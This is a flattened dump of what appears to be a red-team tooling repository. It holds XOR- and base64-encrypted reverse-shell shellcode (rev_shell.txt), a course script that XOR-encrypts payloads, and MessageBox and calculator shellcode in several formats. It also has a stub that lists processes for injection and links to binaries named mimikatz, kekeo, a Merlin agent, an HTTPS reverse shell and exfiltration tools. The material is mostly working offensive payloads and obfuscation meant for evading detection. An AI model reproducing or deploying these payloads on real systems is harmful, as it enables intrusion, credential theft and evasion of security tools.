ji31gZ6P/DA3ciQnJD41eAHlFy39Nw42eLtlai39N04xfQH+OmrBLyQvu0JnOlS2yVIGTDIbUiS3rGMmMfHVnzc3NCbsYhC8MFk+ZL4BsUgveWd54BxnMDC88u12ZW4vtfBDFS13teUvKHS8MkU/ZL4302Z/jaw7VKcmuwS/OmSgLV+nnHH2u2g3ZK9f0EXGPmY6QWYiCeFCqj0y7i5DeTHnFCT9aSYju3ArO2SmJOVjuHg2oiQuJDY5aWp2KiQvJDQvs9wXMzeJhTYmaWp/+XefLpGYz21/Q74lLNAQWV5eHAACZS8xeLnWO6K0KRlBN8/iITY+7I80an0GsihHrD00eYoNJBzRZW5nMM/immt2ZW5WCQIZQ1NOS15JAQEHcj8+7K8u9/DldmV2KF+uY2NdcTY/3znur/Y3cmV2mruPFDA3ckpDNlw/AXhWFz8wDwExHVxhGx0ADigmZ10OIg8TBj8iQB1lci3/pD09cWh6Q6wlLdZnApizcmV2ZT40Y3nwsI4jS1WY5Xi+tA98OibuwVooKDce5V1nMHm+kg9yJDcuikVx7ON2ZW5nz+V6Q6UlPybuwX0GuyhHrD00eff1X2NuHpGytfBCbS2xpOZ0MDB+yCGGUI5nMDA3jbA+mqETMtudmjB2ZW40aVp3KCz/tK+FIHnwsmVmZW4uimiTIYB2ZW5nz+V/4TYlLeeAeLnGOuysLKmnMBA3ciz/nCfdIqa+kGV2ZW6Y5Xi0tkXzpRrVVrswOmS14K4S4mj0Kg92PNWHLRo9M+ysmrs= 2 | -------------------------------------------------------------------------------- /dotNETbinaries/XOR_b64_encrypted/rev_shell.txt: -------------------------------------------------------------------------------- 1 | ji31gZ6P8DA3ciQnJD41YWZ/Q7cTLeU1UHi8IH0+7jxHeLtFIi150iQtfQH+OlS2yVIGTDIbUiS3rGMmMfHVnzc3NCbsYhC8MFk+ZL7ssLg3cmU+4K4TV3g2ojX9LXYju3AXO2Smhjgvz/l2+VH+LW+xfQH+OlS2yS+m+T12c6ROhRuWfDN7Vm0zXL8S6Ghz+SVSLG+3VnG8fi0y7i57eTHnM+5y7SZm4HFvMz0oPDQmaHFuMz8+5oJHcWLIkj03PDQvuyLeJZqJmjMujkdEQDpFV25ncWZ++4M+5ILHMTA3O+yTLNJlMDTlDWV2ZC8zebnTPuyHJNQrRxYwjbA67IQPMTE3cjw330fnWzDIpzUmKF+ufQH3Opq2LeeleM/3Ouy3JNSNP+/XjbA+7KkNIHFvPuyULeeecYqu1xEXmrsvsfR3cGV2LNYEXVQ3cmV2ZS83cWB/+4chMjkqAfBdfzw3NYybVvdzVjF3ZCbqdBQvtGUeLeeBZmB2IiQmJD4uz/B2IiyJrSPu8Xy+syTMHKJYts/iOlSkLZGtuz52yG3xeA6Y5YvXb098JNTBpY2qjbA+5qpPDDZLeOWNhRtii3ckAAocZTcmuerIpw== 2 | -------------------------------------------------------------------------------- /dotNETbinaries/XOR_encrypted/README.md: -------------------------------------------------------------------------------- 1 | cmd> python2.exe .\xorencrypt.py .\mssgbox_shellcode_x64.bin 2 | 3 | -------------------------------------------------------------------------------- /dotNETbinaries/XOR_encrypted/mssgbox_shellcode_x64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/XOR_encrypted/mssgbox_shellcode_x64.bin -------------------------------------------------------------------------------- /dotNETbinaries/XOR_encrypted/xorencrypt.py: -------------------------------------------------------------------------------- 1 | # Red Team Operator course code template 2 | # payload encryption with XOR 3 | # 4 | # author: reenz0h (twitter: @sektor7net) 5 | # Use: python2.exe .\xorencrypt.py .\mssgbox_shellcode_x64.bin 6 | 7 | import sys 8 | 9 | KEY = "mysecretkeee" 10 | 11 | def xor(data, key): 12 | 13 | key = str(key) 14 | l = len(key) 15 | output_str = "" 16 | 17 | for i in range(len(data)): 18 | current = data[i] 19 | current_key = key[i % len(key)] 20 | output_str += chr(ord(current) ^ ord(current_key)) 21 | 22 | return output_str 23 | 24 | def printCiphertext(ciphertext): 25 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 26 | 27 | 28 | 29 | try: 30 | plaintext = open(sys.argv[1], "rb").read() 31 | except: 32 | print("File argument needed! %s " % sys.argv[0]) 33 | sys.exit() 34 | 35 | 36 | ciphertext = xor(plaintext, KEY) 37 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /dotNETbinaries/b64_encoding/README.md: -------------------------------------------------------------------------------- 1 | cmd> certutil -encode .\mssgbox_shellcode_x64.bin .\mssgbox_shellcode_x64.b64 2 | 3 | -------------------------------------------------------------------------------- /dotNETbinaries/b64_encoding/mssgbox_shellcode_arranged_x64.b64: -------------------------------------------------------------------------------- 1 | /EiB5PD////o0AAAAEFRQVBSUVZIMdJlSItSYD5Ii1IYPkiLUiA+SItyUD5ID7dKSk0xyUgxwKw8YXwCLCBBwckNQQHB4u1SQVE+SItSID6LQjxIAdA+i4CIAAAASIXAdG9IAdBQPotIGD5Ei0AgSQHQ41xI/8k+QYs0iEgB1k0xyUgxwKxBwckNQQHBOOB18T5MA0wkCEU50XXWWD5Ei0AkSQHQZj5BiwxIPkSLQBxJAdA+QYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVo+SIsS6Un///9dScfBAAAAAD5IjZX+AAAAPkyNhRMBAABIMclBukWDVgf/1UgxyUG68LWiVv/VSGVsbG8gZnJvbSBzaGVsbGNvZGUATWVzc2FnZUJveAA= 2 | -------------------------------------------------------------------------------- /dotNETbinaries/b64_encoding/mssgbox_shellcode_x64.b64: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | /EiB5PD////o0AAAAEFRQVBSUVZIMdJlSItSYD5Ii1IYPkiLUiA+SItyUD5ID7dK 3 | Sk0xyUgxwKw8YXwCLCBBwckNQQHB4u1SQVE+SItSID6LQjxIAdA+i4CIAAAASIXA 4 | dG9IAdBQPotIGD5Ei0AgSQHQ41xI/8k+QYs0iEgB1k0xyUgxwKxBwckNQQHBOOB1 5 | 8T5MA0wkCEU50XXWWD5Ei0AkSQHQZj5BiwxIPkSLQBxJAdA+QYsEiEgB0EFYQVhe 6 | WVpBWEFZQVpIg+wgQVL/4FhBWVo+SIsS6Un///9dScfBAAAAAD5IjZX+AAAAPkyN 7 | hRMBAABIMclBukWDVgf/1UgxyUG68LWiVv/VSGVsbG8gZnJvbSBzaGVsbGNvZGUA 8 | TWVzc2FnZUJveAA= 9 | -----END CERTIFICATE----- 10 | -------------------------------------------------------------------------------- /dotNETbinaries/b64_encoding/mssgbox_shellcode_x64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/b64_encoding/mssgbox_shellcode_x64.bin -------------------------------------------------------------------------------- /dotNETbinaries/checkprocess.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | 4 | namespace Myprocesses 5 | { 6 | class GetProcesses 7 | { 8 | static void CmdMenu() 9 | { 10 | Console.Write("\n"); 11 | Console.Write(@"[*] Use: 12 | 1 : To list all processes and corresponding PIDs. 13 | 2 : To get current process name and PID. 14 | 3 : Dump all injectable processes. 15 | 4 : To exit."); 16 | } 17 | 18 | static void ListAllProcesses() 19 | { 20 | Process[] processCollection = Process.GetProcesses(); 21 | int index = 1; 22 | foreach (Process p in processCollection) 23 | { 24 | Console.WriteLine("{0}. PID: {1} => ProcessName: {2}", index, p.Id, p.ProcessName); 25 | index ++; 26 | } 27 | } 28 | 29 | static void CurrentProcess() 30 | { 31 | Process current = Process.GetCurrentProcess(); 32 | Console.WriteLine("PID: {0} => ProcessName: {1}", current.Id, current.ProcessName); 33 | } 34 | 35 | // ====== Exit function ============== 36 | 37 | public static void EXIT(string cmd) 38 | { 39 | if (cmd.Equals("exit")) 40 | { 41 | // exiting 42 | System.Environment.Exit(1); 43 | } 44 | } 45 | 46 | // ============= Main Console ============= 47 | 48 | public static void MainConsole() 49 | { 50 | while(true) 51 | { 52 | CmdMenu(); 53 | // Starting Menu: 54 | Console.Write("\n[>] "); 55 | string userinput = Console.ReadLine(); 56 | if (userinput == null || userinput.Equals("")) 57 | { 58 | Console.WriteLine("[-] User input is out of Command Menu Syllabus\n"); 59 | continue; 60 | } 61 | 62 | EXIT(userinput); 63 | 64 | switch(userinput) 65 | { 66 | case "1": 67 | 68 | ListAllProcesses(); 69 | break; 70 | 71 | case "2": 72 | 73 | CurrentProcess(); 74 | break; 75 | 76 | case "3": 77 | 78 | Console.WriteLine("[+] Dumping injectable processes..."); 79 | break; 80 | 81 | default: 82 | break; 83 | } 84 | } 85 | } 86 | 87 | public static void Main() 88 | { 89 | MainConsole(); 90 | //return 0; 91 | } 92 | } 93 | 94 | } 95 | -------------------------------------------------------------------------------- /dotNETbinaries/checkprocess.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/checkprocess.exe -------------------------------------------------------------------------------- /dotNETbinaries/cpp_test_payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/cpp_test_payload.exe -------------------------------------------------------------------------------- /dotNETbinaries/exfiltrate.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/exfiltrate.exe -------------------------------------------------------------------------------- /dotNETbinaries/exfiltrate_via_post.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/exfiltrate_via_post.exe -------------------------------------------------------------------------------- /dotNETbinaries/mscorlib.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/mscorlib.exe -------------------------------------------------------------------------------- /dotNETbinaries/mssgbox_csharp_shellcode_x64.txt: -------------------------------------------------------------------------------- 1 | byte[] buf = new byte[299] { 2 | 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51, 3 | 0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48, 4 | 0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48, 5 | 0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02, 6 | 0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e, 7 | 0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88, 8 | 0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48, 9 | 0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e, 10 | 0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41, 11 | 0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24, 12 | 0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 13 | 0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e, 14 | 0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41, 15 | 0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41, 16 | 0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1, 17 | 0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d, 18 | 0x85,0x13,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff, 19 | 0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c, 20 | 0x6c,0x6f,0x20,0x66,0x72,0x6f,0x6d,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f, 21 | 0x64,0x65,0x00,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 }; 22 | -------------------------------------------------------------------------------- /dotNETbinaries/mssgbox_csharp_shellcode_x86.txt: -------------------------------------------------------------------------------- 1 | byte[] buf = new byte[277] { 2 | 0xd9,0xeb,0x9b,0xd9,0x74,0x24,0xf4,0x31,0xd2,0xb2,0x77,0x31,0xc9,0x64,0x8b, 3 | 0x71,0x30,0x8b,0x76,0x0c,0x8b,0x76,0x1c,0x8b,0x46,0x08,0x8b,0x7e,0x20,0x8b, 4 | 0x36,0x38,0x4f,0x18,0x75,0xf3,0x59,0x01,0xd1,0xff,0xe1,0x60,0x8b,0x6c,0x24, 5 | 0x24,0x8b,0x45,0x3c,0x8b,0x54,0x28,0x78,0x01,0xea,0x8b,0x4a,0x18,0x8b,0x5a, 6 | 0x20,0x01,0xeb,0xe3,0x34,0x49,0x8b,0x34,0x8b,0x01,0xee,0x31,0xff,0x31,0xc0, 7 | 0xfc,0xac,0x84,0xc0,0x74,0x07,0xc1,0xcf,0x0d,0x01,0xc7,0xeb,0xf4,0x3b,0x7c, 8 | 0x24,0x28,0x75,0xe1,0x8b,0x5a,0x24,0x01,0xeb,0x66,0x8b,0x0c,0x4b,0x8b,0x5a, 9 | 0x1c,0x01,0xeb,0x8b,0x04,0x8b,0x01,0xe8,0x89,0x44,0x24,0x1c,0x61,0xc3,0xb2, 10 | 0x08,0x29,0xd4,0x89,0xe5,0x89,0xc2,0x68,0x8e,0x4e,0x0e,0xec,0x52,0xe8,0x9f, 11 | 0xff,0xff,0xff,0x89,0x45,0x04,0xbb,0x7e,0xd8,0xe2,0x73,0x87,0x1c,0x24,0x52, 12 | 0xe8,0x8e,0xff,0xff,0xff,0x89,0x45,0x08,0x68,0x6c,0x6c,0x20,0x41,0x68,0x33, 13 | 0x32,0x2e,0x64,0x68,0x75,0x73,0x65,0x72,0x30,0xdb,0x88,0x5c,0x24,0x0a,0x89, 14 | 0xe6,0x56,0xff,0x55,0x04,0x89,0xc2,0x50,0xbb,0xa8,0xa2,0x4d,0xbc,0x87,0x1c, 15 | 0x24,0x52,0xe8,0x5f,0xff,0xff,0xff,0x68,0x6f,0x78,0x58,0x20,0x68,0x61,0x67, 16 | 0x65,0x42,0x68,0x4d,0x65,0x73,0x73,0x31,0xdb,0x88,0x5c,0x24,0x0a,0x89,0xe3, 17 | 0x68,0x58,0x20,0x20,0x20,0x68,0x63,0x6f,0x64,0x65,0x68,0x68,0x65,0x6c,0x6c, 18 | 0x68,0x6f,0x6d,0x20,0x73,0x68,0x6f,0x20,0x66,0x72,0x68,0x48,0x65,0x6c,0x6c, 19 | 0x31,0xc9,0x88,0x4c,0x24,0x14,0x89,0xe1,0x31,0xd2,0x52,0x53,0x51,0x52,0xff, 20 | 0xd0,0x31,0xc0,0x50,0xff,0x55,0x08 }; 21 | -------------------------------------------------------------------------------- /dotNETbinaries/mssgbox_shellcode_x64_with_hexsymbol.txt: -------------------------------------------------------------------------------- 1 | \xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\xfe\x00\x00\x00\x3e\x4c\x8d\x85\x13\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2\x56\xff\xd5\x48\x65\x6c\x6c\x6f\x20\x66\x72\x6f\x6d\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x00\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00 2 | -------------------------------------------------------------------------------- /dotNETbinaries/mssgbox_shellcode_x64_without_hexsymbol.txt: -------------------------------------------------------------------------------- 1 | fc4881e4f0ffffffe8d0000000415141505251564831d265488b52603e488b52183e488b52203e488b72503e480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed5241513e488b52203e8b423c4801d03e8b80880000004885c0746f4801d0503e8b48183e448b40204901d0e35c48ffc93e418b34884801d64d31c94831c0ac41c1c90d4101c138e075f13e4c034c24084539d175d6583e448b40244901d0663e418b0c483e448b401c4901d03e418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a3e488b12e949ffffff5d49c7c1000000003e488d95fe0000003e4c8d85130100004831c941ba45835607ffd54831c941baf0b5a256ffd548656c6c6f2066726f6d207368656c6c636f6465004d657373616765426f7800 2 | -------------------------------------------------------------------------------- /dotNETbinaries/nointeract.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | 3 | class Program 4 | { 5 | public static void Main() 6 | { 7 | Console.WriteLine("1"); 8 | Console.WriteLine("1"); 9 | Console.WriteLine("1"); 10 | Console.WriteLine("1"); 11 | Console.WriteLine("1"); 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /dotNETbinaries/nointeract.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/nointeract.exe -------------------------------------------------------------------------------- /https_revshell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/https_revshell.exe -------------------------------------------------------------------------------- /kekeo.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/kekeo.exe -------------------------------------------------------------------------------- /merlinAgent-Linux-x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/merlinAgent-Linux-x64 -------------------------------------------------------------------------------- /mimikatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/mimikatz.exe -------------------------------------------------------------------------------- /nasm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/nasm.exe -------------------------------------------------------------------------------- /test.txt: -------------------------------------------------------------------------------- 1 | unsigned char enc_shellcode_bin[] = "\xFC\x48\x83\xE4\xF0\xE8\xC0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x8B\x80\x88\x00\x00\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1\x38\xE0\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xE9\x57\xFF\xFF\xFF\x5D\x48\xBA\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8D\x8D\x01\x01\x00\x00\x41\xBA\x31\x8B\x6F\x87\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x41\xBA\xA6\x95\xBD\x9D\xFF\xD5\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5\x63\x61\x6C\x63\x00"; 2 | -------------------------------------------------------------------------------- /xxd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/xxd.exe --------------------------------------------------------------------------------